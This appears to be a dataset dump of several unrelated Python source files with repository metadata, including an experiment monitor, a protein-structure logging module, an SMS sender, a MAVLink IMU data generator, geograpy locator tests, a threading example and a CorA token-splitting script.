|
74cefcc734c6a38418151025b0a4d8b6cb41eb14
|
[
"Apache-2.0"
] | 9
|
2018-04-02T19:54:20.000Z
|
2020-02-11T09:12:41.000Z
|
#!/usr/bin/env python3
"""
Usage:
python monitor.py randopt_results/simple_example/
"""
import sys
import os
import time
import curses
import randopt as ro
USE_MPL = True
USE_CURSES = True
try:
from terminaltables import AsciiTable, SingleTable
except:
raise('run pip install terminaltables')
try:
import matplotlib.pyplot as plt
except:
print('matplotlib not found, live plotting disable.')
USE_MPL = False
def table_statistics(counts, timings, minimums, maximums, name='Experiment'):
minimum = "{0:.3f}".format(minimums[-1])
maximum = "{0:.3f}".format(maximums[-1])
timing = "{0:.2f}".format(timings[-1])
data = [
['Results Count', 'Minimum Result', 'Maximum Result', 'Time Elapsed'],
[counts[-1], minimum, maximum, timing],
]
if USE_CURSES:
table = AsciiTable(data, name)
else:
table = SingleTable(data, name)
# table = SingleTable(data, name)
table.inner_heading_row_border = True
table.inner_row_border = True
table.inner_column_border = True
table.outer_border = False
table.justify_columns = {0: 'center', 1: 'center', 2: 'center', 3: 'center'}
return table.table
def plot_statistics(counts, timings, minimums, maximums, name='Experiment'):
plt.ion()
plt.clf()
# Min subplot
plt.subplot(211)
plt.title('Experiment ' + name + ' Statistics')
plt.plot(counts, minimums, label='Minimum')
plt.legend()
plt.ylabel('Result')
# Min subplot
plt.subplot(212)
plt.plot(counts, maximums, label='Maximum')
plt.legend()
plt.xlabel('Number of experiments')
plt.ylabel('Result')
# This renders the figure
plt.pause(0.05)
if __name__ == '__main__':
exp_path = sys.argv[1]
if exp_path[-1] == '/':
exp_path = exp_path[:-1]
exp_dir, exp_name = os.path.split(exp_path)
exp = ro.Experiment(exp_name, directory=exp_dir)
# init interactive display
if USE_CURSES:
screen = curses.initscr()
curses.noecho()
curses.cbreak()
curses.curs_set(False)
screen.keypad(True)
start_time = time.time()
timings = []
minimums = []
maximums = []
counts = []
try:
while True:
minimums.append(exp.minimum().result)
maximums.append(exp.maximum().result)
counts.append(exp.count())
timings.append(time.time() - start_time)
if USE_MPL:
plot_statistics(counts, timings, minimums, maximums, exp_name)
table = table_statistics(
counts, timings, minimums, maximums, exp_name)
if USE_CURSES:
screen.addstr(0, 0, 'Experiment ' + exp_name + ' Statistics')
for i, line in enumerate(table.split('\n')):
line = line.replace('-', u'\u2500')
line = line.replace('|', u'\u2502')
line = line.replace('+', u'\u253c')
screen.addstr(2 + i, 0, line)
screen.refresh()
else:
print(table)
if USE_MPL:
plt.pause(5)
else:
time.sleep(5)
finally:
if USE_CURSES:
curses.echo()
curses.nocbreak()
screen.keypad(True)
curses.endwin()
| 27.08
| 80
| 0.576662
| 386
| 3,385
| 4.935233
| 0.354922
| 0.015748
| 0.060367
| 0.065092
| 0.165354
| 0.113386
| 0.103937
| 0
| 0
| 0
| 0
| 0.018487
| 0.296898
| 3,385
| 124
| 81
| 27.298387
| 0.781933
| 0.05613
| 0
| 0.210526
| 0
| 0
| 0.098994
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021053
| false
| 0
| 0.073684
| 0
| 0.105263
| 0.021053
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ec67e739da8431aa5c39d649a7e5eb15794f15
| 6,973
|
py
|
Python
|
LOG.py
|
viniciusdc/Protein_structure_SPGm
|
861672071f2a47b54e4624fc1f69cf3fff0ff356
|
[
"MIT"
] | null | null | null |
LOG.py
|
viniciusdc/Protein_structure_SPGm
|
861672071f2a47b54e4624fc1f69cf3fff0ff356
|
[
"MIT"
] | null | null | null |
LOG.py
|
viniciusdc/Protein_structure_SPGm
|
861672071f2a47b54e4624fc1f69cf3fff0ff356
|
[
"MIT"
] | null | null | null |
from Methods.utils import rmsd, mde
from datetime import datetime
import logging
import json
import sys
def os_display_call(test_path, main, data, multistart=False):
(
filename,
num_atom_init,
total_atoms_ord,
m,
prop_dist,
convex,
fo_non_scaled,
fo_scaled,
ops,
) = main
xi, solution, u, v, lb, ub = ops
# Get logger
logger = logging.getLogger('root.spgLOG')
logger.info(
"########################################## INFO ##########################################"
)
logger.info(
f":: Protein: {filename}, Initial atoms number: {num_atom_init}, after re-ordination {total_atoms_ord}."
)
logger.info(f":: Assessed distances: {m} and known distances: {prop_dist}.")
if convex:
logger.info(
f":: Initial objective value for the relaxed problem: {fo_non_scaled:.4e}"
)
logger.info(
f":: Initial objective value for the relaxed problem --scaled {fo_scaled:.4e}"
)
rmsd_i, mde_i = rmsd(xi, solution), mde(xi, u, v, lb, ub)
logger.info(f":: RMSDi = {rmsd_i:<24.2e} MDEi = {mde_i:.2e}")
# -----------------------------------------------------------------------------------
# Multi-start option --Enabled
# -----------------------------------------------------------------------------------
if multistart:
if type(data) != dict:
logger.warning(":: data type object not match with dict structure!")
logger.warning(":: The process was interrupted")
return exit()
logger.info(":: spg results --multi start: True")
logger.info(
":: Iter - bck -- RMSDf ----- MDEf"
" ----- i_val ----- f_val ----- gtd ----- |d| ----- time(s)"
)
sub_log = {}
k = 0
for key in data:
out, elapsed_time, fo = data[key]
x_spg, backtracking, iterations, fun_o, gtd, norm_d = out
# Statistics:
rmsd_f = rmsd(x_spg, solution)
mde_f = mde(x_spg, u, v, lb, ub)
prompt_string = (
f" {iterations:<5}: {backtracking:<6} {rmsd_f:<11.2e} {mde_f:<10.2e} {fo / 2:<11.2e} "
f"{fun_o / 2:<10.2e} {gtd:<10.2e} {norm_d:<10.2e} {elapsed_time:.3f}"
)
sub_log[k] = {"iter": f'{iterations:<7}', "back": f'{backtracking:<6}', "RMDSf": f'{rmsd_f:<11.2e}',
"MDEf": f'{mde_f:<10.2e}', "fun_i": f'{fo / 2:<11.2e}', "fun_f": f'{fun_o / 2:<10.2e}',
"gtd": f'{gtd:<10.2e}', "norm_d": f'{norm_d:<10.2e}', "time": f'{elapsed_time:.3f}'}
logger.info(prompt_string)
k += 1
logger.info(
"############################################################################################"
)
# -----------------------------------------------------------------------------
# Generating output file with statistics:
# -----------------------------------------------------------------------------
static_dict = {"node": f'{filename}', "init_atom_#": f"{num_atom_init}",
"atom_#_re-ordination": f'{total_atoms_ord}',
"assessed_dist": f'{m}', "Know_dist": f'{prop_dist}'}
if convex:
static_dict["convex"] = True
static_dict["init_fun_val_relax"] = f'{fo_non_scaled:.4e}'
static_dict["init_fun_val_relax_k"] = f'{fo_scaled:.4e}'
else:
static_dict["convex"] = False
static_dict["init_fun_val_relax"] = 'N/A'
static_dict["init_fun_val_relax_k"] = 'N/A'
static_dict["RMSDi"] = f'{rmsd_i:<24.2e}'
static_dict["MDEi"] = f'{mde_i:.2e}'
if type(data) != dict:
logger.warning(":: data type object not match with dict structure!\n")
logger.warning(":: The process was interrupted\n")
multistart_list = []
n = len(sub_log.keys())
for i in range(n):
multistart_list.append(sub_log[i])
static_dict["multi-start"] = multistart_list
static_dict["standard"] = False
static_log = test_path + f"\\spg_static_multistart_LOG.txt"
with open(static_log, "w") as f:
json.dump(static_dict, f)
# -----------------------------------------------------------------------------------
# Multi-start --Disable Standard
# -----------------------------------------------------------------------------------
else:
out, elapsed_time, fo = data
x_spg, backtracking, iterations, fun_o, gtd, norm_d = out
# Statistics:
rmsd_f = rmsd(x_spg, solution)
mde_f = mde(x_spg, u, v, lb, ub)
logger.info(":: spg results --multi start: False")
logger.info(
":: Iter - bck -- RMSDf ----- MDEf"
" ----- i_val ----- f_val ----- gtd ----- |d| ----- time(s)"
)
prompt_string = (
f" {iterations:<5}: {backtracking:<6} {rmsd_f:<11.2e} {mde_f:<10.2e} {fo / 2:<11.2e} "
f"{fun_o / 2:<10.2e} {gtd:<10.2e} {norm_d:<10.2e} {elapsed_time:.3f}"
)
logger.info(prompt_string)
logger.info(
"############################################################################################"
)
# -----------------------------------------------------------------------------
# Generating output file with statistics:
# -----------------------------------------------------------------------------
static_log = test_path + f"\\spg_static_standard_LOG.txt"
static_dict = {"node": f'{filename}', "init_atom_#": f"{num_atom_init}",
"atom_#_re-ordination": f'{total_atoms_ord}',
"assessed_dist": f'{m}', "Know_dist": f'{prop_dist}'}
if convex:
static_dict["convex"] = True
static_dict["init_fun_val_relax"] = f'{fo_non_scaled:.4e}'
static_dict["init_fun_val_relax_k"] = f'{fo_scaled:.4e}'
else:
static_dict["convex"] = False
static_dict["init_fun_val_relax"] = 'N/A'
static_dict["init_fun_val_relax_k"] = 'N/A'
static_dict["RMSDi"] = f'{rmsd_i:<24.2e}'
static_dict["MDEi"] = f'{mde_i:.2e}'
static_dict["multi-start"] = False
static_dict["standard"] = {"iter": f'{iterations:<7}', "back": f'{backtracking:<6}',
"RMDSf": f'{rmsd_f:<11.2e}',
"MDEf": f'{mde_f:<10.2e}', "fun_i": f'{fo / 2:<11.2e}',
"fun_f": f'{fun_o / 2:<10.2e}',
"gtd": f'{gtd:<10.2e}', "norm_d": f'{norm_d:<10.2e}',
"time": f'{elapsed_time:.3f}'}
with open(static_log, "w") as file:
json.dump(static_dict, file)
| 43.855346
| 113
| 0.443711
| 777
| 6,973
| 3.75547
| 0.191763
| 0.082248
| 0.038382
| 0.046607
| 0.701851
| 0.688143
| 0.623029
| 0.591501
| 0.559287
| 0.559287
| 0
| 0.022436
| 0.284096
| 6,973
| 158
| 114
| 44.132911
| 0.562099
| 0.118027
| 0
| 0.446154
| 0
| 0.030769
| 0.385719
| 0.053472
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007692
| false
| 0
| 0.038462
| 0
| 0.053846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9f038d1fb5d0607ea396a1c5e9bb4c50b48b589
| 449
|
py
|
Python
|
src/services/sms.py
|
HutRubberDuck/super-mini-divar
|
191c2f9a412ef879b52f4a71e0fe74743138ab13
|
[
"Apache-2.0"
] | null | null | null |
src/services/sms.py
|
HutRubberDuck/super-mini-divar
|
191c2f9a412ef879b52f4a71e0fe74743138ab13
|
[
"Apache-2.0"
] | null | null | null |
src/services/sms.py
|
HutRubberDuck/super-mini-divar
|
191c2f9a412ef879b52f4a71e0fe74743138ab13
|
[
"Apache-2.0"
] | null | null | null |
from kavenegar import KavenegarAPI, APIException, HTTPException
from src.core.settings import OTP_API_KEY
def send_sms(phone, message):
try:
api = KavenegarAPI(OTP_API_KEY)
response = api.sms_send({
'sender': '10008663',
'receptor': phone,
'message': message,
})
print(response)
except APIException as e:
print(e)
except HTTPException as e:
print(e)
| 23.631579
| 63
| 0.605791
| 49
| 449
| 5.428571
| 0.530612
| 0.045113
| 0.067669
| 0.067669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.305122
| 449
| 18
| 64
| 24.944444
| 0.826923
| 0
| 0
| 0.133333
| 0
| 0
| 0.064588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9f2d64566db5376ed467678309c5e2282462dda
| 923
|
py
|
Python
|
src/ground/drainbow_mcc/src/drainbow_mcc/emitter/imu.py
|
granum-space/cansat-2017-2018
|
4d9db6f2d55c726e11abbb60fd436ec3eafc2373
|
[
"MIT"
] | null | null | null |
src/ground/drainbow_mcc/src/drainbow_mcc/emitter/imu.py
|
granum-space/cansat-2017-2018
|
4d9db6f2d55c726e11abbb60fd436ec3eafc2373
|
[
"MIT"
] | 9
|
2017-10-31T19:20:05.000Z
|
2018-06-17T19:08:52.000Z
|
src/ground/drainbow_mcc/src/drainbow_mcc/emitter/imu.py
|
granum-space/cansat-2018
|
4d9db6f2d55c726e11abbb60fd436ec3eafc2373
|
[
"MIT"
] | 1
|
2018-06-12T11:30:10.000Z
|
2018-06-12T11:30:10.000Z
|
import random
import logging
import time
from datetime import timedelta
from pymavlink import mavutil
_log = logging.getLogger(__name__)
def now():
return int(round(time.time()*1000))
def random_scaled_imu_test(url: str, pause: timedelta):
connection = mavutil.mavlink_connection(url)
mav = connection.mav
_log.info("Запускаю генерацию случайных данных БИНС")
_log.info("параметры: %s, %s" % (url, pause))
boot_time = now()
datagen = lambda: int(round(random.uniform(0, 1)*9.8*3))
while True:
msg = mav.scaled_mpu6000_encode(
time_boot_ms=now() - boot_time,
xacc=datagen(),
yacc=datagen(),
zacc=datagen(),
xgyro=datagen(),
ygyro=datagen(),
zgyro=datagen(),
temperature=datagen(),
)
_log.debug(msg)
mav.send(msg)
time.sleep(pause.total_seconds())
| 23.666667
| 60
| 0.612134
| 109
| 923
| 5.009174
| 0.568807
| 0.029304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0.267606
| 923
| 38
| 61
| 24.289474
| 0.788462
| 0
| 0
| 0
| 0
| 0
| 0.061822
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.172414
| 0.034483
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9f4af671dfa98273bbb6368b1d6afc8208adaae
| 12,548
|
py
|
Python
|
tests/test_locator.py
|
somnathrakshit/geograpy3
|
8a247cc2b164cf48b5ce4e7f9349adfef39e7ea4
|
[
"Apache-2.0"
] | 53
|
2020-09-09T06:58:29.000Z
|
2022-03-08T19:16:12.000Z
|
tests/test_locator.py
|
somnathrakshit/geograpy3
|
8a247cc2b164cf48b5ce4e7f9349adfef39e7ea4
|
[
"Apache-2.0"
] | 51
|
2020-09-09T09:31:27.000Z
|
2022-01-17T07:12:27.000Z
|
tests/test_locator.py
|
somnathrakshit/geograpy3
|
8a247cc2b164cf48b5ce4e7f9349adfef39e7ea4
|
[
"Apache-2.0"
] | 9
|
2020-09-09T09:13:03.000Z
|
2021-12-14T11:04:34.000Z
|
'''
Created on 2020-09-19
@author: wf
'''
import os.path
import tempfile
import unittest
from pathlib import Path
from lodstorage.storageconfig import StorageConfig
import geograpy
import getpass
from geograpy.locator import Locator, City,CountryManager, Location, LocationContext
from collections import Counter
from lodstorage.uml import UML
import re
from tests.basetest import Geograpy3Test
class TestLocator(Geograpy3Test):
'''
test the Locator class from the location module
'''
def lookupQuery(self,viewName,whereClause):
loc=Locator.getInstance()
queryString=f"SELECT * FROM {viewName} where {whereClause} AND pop is not NULL ORDER by pop desc"
lookupRecords=loc.sqlDB.query(queryString)
return lookupRecords
def checkExpected(self,lod,expected):
emap={}
found={}
for key,value in expected:
emap[key]=value
for record in lod:
name=record["name"]
pop=record["pop"]
if name in emap and pop> emap[name]:
found[name]=record
if self.debug:
print(f"{name}:{pop:.0f}")
self.assertEqual(len(found),len(emap))
def testHasViews(self):
'''
test that the views are available
'''
loc=Locator.getInstance()
viewsMap=loc.sqlDB.getTableDict(tableType="view")
for view in ["CityLookup","RegionLookup","CountryLookup"]:
self.assertTrue(view in viewsMap)
def testCityLookup(self):
'''
test the cityLookup to city/region/country object cluster
'''
cityLookupRecords=self.lookupQuery("CityLookup", "label in ('Berlin','Paris','Athens','Singapore')")
expected=[("Berlin",3644000),("Paris",2175000),("Athens",600000),("Singapore",5800000)]
self.checkExpected(cityLookupRecords,expected)
def testRegionLookup(self):
'''
test region Lookup
'''
regionLookupRecords=self.lookupQuery("RegionLookup", "label in ('CA')")
expected=[("California",39000000)]
self.checkExpected(regionLookupRecords,expected)
def testCountryLookup(self):
'''
test country Lookup
'''
#self.debug=True
countryLookupRecords=self.lookupQuery("CountryLookup", "label in ('CA')")
expected=[("Canada",37000000)]
self.checkExpected(countryLookupRecords,expected)
def testIsoRegexp(self):
'''
test regular expression for iso codes
'''
loc=Locator.getInstance()
self.assertFalse(loc.isISO('Singapore'))
query="""
select distinct iso from countries
union
select distinct iso from regions
"""
loc.populate_db()
isocodeRecords=loc.sqlDB.query(query)
for isocodeRecord in isocodeRecords:
isocode=isocodeRecord['iso']
if isocode:
isIso=loc.isISO(isocode)
if not isIso and self.debug:
print(isocode)
self.assertTrue(isIso)
def testWordCount(self):
'''
test the word count
'''
loc=Locator.getInstance()
query="SELECT name from CITIES"
nameRecords=loc.sqlDB.query(query)
if self.debug:
print ("testWordCount: found %d names" % len(nameRecords))
wc=Counter()
for nameRecord in nameRecords:
name=nameRecord['name']
words=re.split(r"\W+",name)
wc[len(words)]+=1
if self.debug:
print ("most common 20: %s" % wc.most_common(20))
def testUML(self):
'''
test adding population data from wikidata to GeoLite2 information
'''
Locator.resetInstance()
loc=Locator.getInstance()
loc.populate_db()
user=getpass.getuser()
if self.debug:
print ("current user is %s" % user)
tableList=loc.sqlDB.getTableList()
uml=UML()
title="""geograpy Tables
2021-08-13
[[https://github.com/somnathrakshit/geograpy3 © 2020-2021 geograpy3 project]]"""
plantUml=uml.tableListToPlantUml(tableList,title=title, packageName="geograpy3")
showUml=True
if showUml or self.debug:
print (plantUml)
def checkExamples(self,examples,countries,debug=False,check=True):
'''
check that the given example give results in the given countries
Args:
examples(list): a list of example location strings
countries(list): a list of expected country iso codes
'''
for index,example in enumerate(examples):
city=geograpy.locateCity(example,debug=debug)
if self.debug:
print("%3d: %22s->%s" % (index,example,city))
if check:
self.assertEqual(countries[index],city.country.iso)
def testGetCountry(self):
'''
test getting a country by name or ISO
'''
locator=Locator()
debug=True
examples=[("DE","Germany"),("US","United States of America"),("USA",None)]
for name,expectedName in examples:
country=locator.getCountry(name)
if debug:
print(country)
if expectedName is None:
self.assertIsNone(country)
else:
self.assertIsNotNone(country)
self.assertEqual(expectedName,country.name)
def testIssue15(self):
'''
https://github.com/somnathrakshit/geograpy3/issues/15
test Issue 15 Disambiguate via population, gdp data
'''
examples=['Paris','Vienna', 'Berlin']
countries=['FR','AT', 'DE']
self.checkExamples(examples, countries)
pass
def testIssue17(self):
'''
test issue 17:
https://github.com/somnathrakshit/geograpy3/issues/17
[BUG] San Francisco, USA and Auckland, New Zealand should be locatable #17
'''
examples=['San Francisco, USA','Auckland, New Zealand']
countries=['US','NZ']
self.checkExamples(examples, countries)
def testIssue19(self):
'''
test issue 19
'''
examples=['Puebla City, Mexico','Newcastle, UK','San Juan, Puerto Rico']
countries=['MX','GB','US']
# For Puerto Rico exist two iso codes one as country and one as US region see https://en.wikipedia.org/wiki/Puerto_Rico in the dataset it is recognized as US region
self.checkExamples(examples, countries)
def testStackOverflow64379688(self):
'''
compare old and new geograpy interface
'''
examples=['John Doe 160 Huntington Terrace Newark, New York 07112 United States of America',
'John Doe 30 Huntington Terrace Newark, New York 07112 USA',
'John Doe 22 Huntington Terrace Newark, New York 07112 US',
'Mario Bianchi, Via Nazionale 256, 00148 Roma (RM) Italia',
'Mario Bianchi, Via Nazionale 256, 00148 Roma (RM) Italy',
'Newark','Rome']
for example in examples:
city=geograpy.locateCity(example,debug=False)
if self.debug:
print(city)
def testStackOverflow64418919(self):
'''
https://stackoverflow.com/questions/64418919/problem-retrieving-region-in-us-with-geograpy3
'''
examples=['Seattle']
for example in examples:
city=geograpy.locateCity(example,debug=False)
print(city)
def testProceedingsExample(self):
'''
test a proceedings title Example
'''
examples=['''Proceedings of the
IEEE 14th International Conference on
Semantic Computing, ICSC 2020,
San Diego, CA, USA,
February 3-5, 2020''']
for example in examples:
places = geograpy.get_place_context(text=example)
if self.debug:
print(places)
city=geograpy.locateCity(example,debug=False)
if self.debug:
print(city)
def testDelimiters(self):
'''
test the delimiter statistics for names
'''
loc=Locator.getInstance()
loc.populate_db()
ddls=["DROP VIEW IF EXISTS allNames","""CREATE VIEW allNames as select name from countries
union select name from regions
union select name from cities"""]
for ddl in ddls:
loc.sqlDB.execute(ddl)
query="SELECT name from allNames"
nameRecords=loc.sqlDB.query(query)
show=self.debug
show=True
if show:
print("found %d name records" % len(nameRecords))
ordC=Counter()
for nameRecord in nameRecords:
name=nameRecord["name"]
for char in name:
code=ord(char)
if code<ord("A"):
ordC[code]+=1
for index,countT in enumerate(ordC.most_common(10)):
code,count=countT
if show:
print ("%d: %d %s -> %d" % (index,code,chr(code),count))
def testIssue22(self):
'''
https://github.com/somnathrakshit/geograpy3/issues/22
'''
url='https://en.wikipedia.org/wiki/2012_Summer_Olympics_torch_relay'
places = geograpy.get_geoPlace_context(url = url)
if self.debug:
print(places)
self.assertTrue(len(places.countries)>5)
self.assertTrue(len(places.regions)>5)
self.assertTrue(len(places.cities)>20)
def testExamples(self):
'''
test examples
'''
examples=['Paris, US-TX','Amsterdam, Netherlands', 'Vienna, Austria','Vienna, Illinois, US','Paris, Texas',
'Austin, TX','Austin, Texas',
]
countries=['US','NL','AT','US','US','US','US']
self.checkExamples(examples, countries,debug=False)
def testIssue41_CountriesFromErdem(self):
'''
test getting Country list from Erdem
'''
countryList=CountryManager.fromErdem()
self.assertEqual(247,len(countryList.countries))
if self.debug:
for country in countryList.countries:
print(country)
def testIssue_42_distance(self):
'''
test haversine and location
'''
loc1=Location()
loc1.lat=0
loc1.lon=0
loc2=Location()
loc2.lat=90
loc2.lon=0
d=loc1.distance(loc2)
#self.debug=True
if self.debug:
print(d)
self.assertAlmostEqual(10007.54,d,delta=0.1)
def testIssue_59_db_download(self):
'''
tests the correct downloading of the backup database in different configurations
'''
def getConfig(tmpdir:str):
config=StorageConfig(cacheFile="locations.db", cacheDirName="geograpyTest", cacheRootDir=tmpdir)
config.cacheFile=f"{config.getCachePath()}/{config.cacheFile}"
return config
def downloadAndTestDB(config:StorageConfig, loc:Locator=None, forceUpdate:bool=False):
'''downloads and tests the downloaded db'''
if loc is None:
loc = Locator(storageConfig=config)
loc.downloadDB(forceUpdate=forceUpdate)
self.assertTrue(os.path.exists(config.cacheFile))
self.assertTrue(loc.db_has_data())
return loc
# test downloading with no file in dir
with tempfile.TemporaryDirectory() as tmpdir:
config=getConfig(tmpdir)
downloadAndTestDB(config)
# test downloading with empty file in dir
with tempfile.TemporaryDirectory() as tmpdir:
config=getConfig(tmpdir)
Path(config.cacheFile).touch() # create empty file
loc=downloadAndTestDB(config)
# test downloading with forceUpdate
# drop a important table to check if it is restored
loc.sqlDB.execute("DROP TABLE countries")
self.assertFalse(loc.db_has_data())
downloadAndTestDB(config,loc=loc, forceUpdate=True)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 34.190736
| 172
| 0.582483
| 1,302
| 12,548
| 5.589862
| 0.307988
| 0.019786
| 0.023083
| 0.021984
| 0.173124
| 0.119401
| 0.083952
| 0.071036
| 0.046579
| 0.046579
| 0
| 0.026004
| 0.313516
| 12,548
| 366
| 173
| 34.284153
| 0.818783
| 0.1354
| 0
| 0.194915
| 0
| 0
| 0.167317
| 0.007898
| 0
| 0
| 0
| 0
| 0.067797
| 1
| 0.105932
| false
| 0.012712
| 0.050847
| 0
| 0.173729
| 0.072034
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9fafb5b1dfbe210783fd95968a164f6159dfcac
| 685
|
py
|
Python
|
Python/threadingProcess.py
|
GuruprasadaShridharHegde/Coder-Mansion
|
14529a6d5d4e674ecaf0c771e9cc428ba34b0a2d
|
[
"MIT"
] | 1
|
2022-01-19T04:22:21.000Z
|
2022-01-19T04:22:21.000Z
|
Python/threadingProcess.py
|
GuruprasadaShridharHegde/Coder-Mansion
|
14529a6d5d4e674ecaf0c771e9cc428ba34b0a2d
|
[
"MIT"
] | null | null | null |
Python/threadingProcess.py
|
GuruprasadaShridharHegde/Coder-Mansion
|
14529a6d5d4e674ecaf0c771e9cc428ba34b0a2d
|
[
"MIT"
] | null | null | null |
# example of automatically starting a thread
from time import sleep
from threading import Thread
# custom thread class that automatically starts threads when they are constructed
class AutoStartThread(Thread):
# constructor
def __init__(self, *args, **kwargs):
# call the the parent constructor
super().__init__(*args, **kwargs)
# start the thread
self.start()
# task function
def task():
print('Task starting')
# block for a moment
sleep(1)
# report
print('Task all done')
# create and start the new thread
thread = AutoStartThread(target=task)
# wait for the new thread to finish
thread.join()
| 27.4
| 82
| 0.668613
| 85
| 685
| 5.294118
| 0.588235
| 0.044444
| 0.053333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001957
| 0.254015
| 685
| 25
| 83
| 27.4
| 0.878669
| 0.421898
| 0
| 0
| 0
| 0
| 0.071823
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.416667
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9fbf38f83d878c53f0d81d49f3d590917067274
| 4,332
|
py
|
Python
|
bin/cora_edit_singletoken.py
|
comphist/cora
|
71555df9a520ccab063a8c5eb907feaa1dd88b38
|
[
"MIT"
] | 10
|
2017-07-08T12:05:32.000Z
|
2019-09-22T17:39:12.000Z
|
bin/cora_edit_singletoken.py
|
comphist/cora
|
71555df9a520ccab063a8c5eb907feaa1dd88b38
|
[
"MIT"
] | 31
|
2017-02-24T19:29:51.000Z
|
2020-11-09T15:58:44.000Z
|
bin/cora_edit_singletoken.py
|
comphist/cora
|
71555df9a520ccab063a8c5eb907feaa1dd88b38
|
[
"MIT"
] | 7
|
2017-02-27T12:25:55.000Z
|
2022-01-13T08:55:01.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Marcel Bollmann <bollmann@linguistics.rub.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys
import json
import argparse
def splitAt(token, symbol):
result = token.split(symbol)
if len(result) < 2:
return result
return [x+symbol for x in result[:-1]] + [result[-1]]
class MainApplication(object):
def __init__(self, args):
if args.split:
self.split_mod = "|"
self.split_dipl = "#"
else:
self.split_mod = args.split_mod
self.split_dipl = args.split_dipl
self.lines = [x.strip() for x in args.infile.readlines()]
self.token = ' '.join(self.lines)
args.infile.close()
def throw_error(self, error):
print(error)
exit(1)
def performConversions(self):
result = {}
if self.split_mod:
modern = self.token.split(self.split_mod)
result['mod_ascii'] = result['mod_utf'] = \
[m.replace(self.split_dipl, '') for m in modern]
result['mod_trans'] = [m+self.split_mod for m in modern[:-1]] + [modern[-1]]
else:
result['mod_trans'] = result['mod_ascii'] = \
result['mod_utf'] = [self.token]
if self.split_dipl:
dipl = self.token.split(self.split_dipl)
result['dipl_utf'] = [d.replace(self.split_mod, '') for d in dipl]
result['dipl_trans'] = [d+self.split_dipl for d in dipl[:-1]] + [dipl[-1]]
result['dipl_breaks'] = [0] * len(dipl)
else:
result['dipl_trans'] = result['dipl_utf'] = [self.token]
result['dipl_breaks'] = [0]
return result
def run(self):
result = self.performConversions()
print(json.dumps(result))
if __name__ == '__main__':
description = "Reads a file containing a single token and returns it unchanged in JSON format. Intended to be called from within CorA."
epilog = ""
parser = argparse.ArgumentParser(description=description, epilog=epilog)
parser.add_argument('infile',
metavar='INPUT',
nargs='?',
default=sys.stdin,
type=argparse.FileType('r'),
help='Input file')
# exists for legacy reasons:
parser.add_argument('-s', '--split',
action='store_true',
default=False,
help=('Parse pipe (|) and hash (#) as tokenization symbols; '
'equivalent to --split-mod="|" --split-dipl="#"'))
parser.add_argument('--split-mod',
default='',
type=str,
help='Symbol to split into two moderns (default: None)')
parser.add_argument('--split-dipl',
default='',
type=str,
help='Symbol to split into two dipls (default: None)')
# parser.add_argument('-e', '--encoding',
# default='utf-8',
# help='Encoding of the input file (default: utf-8)')
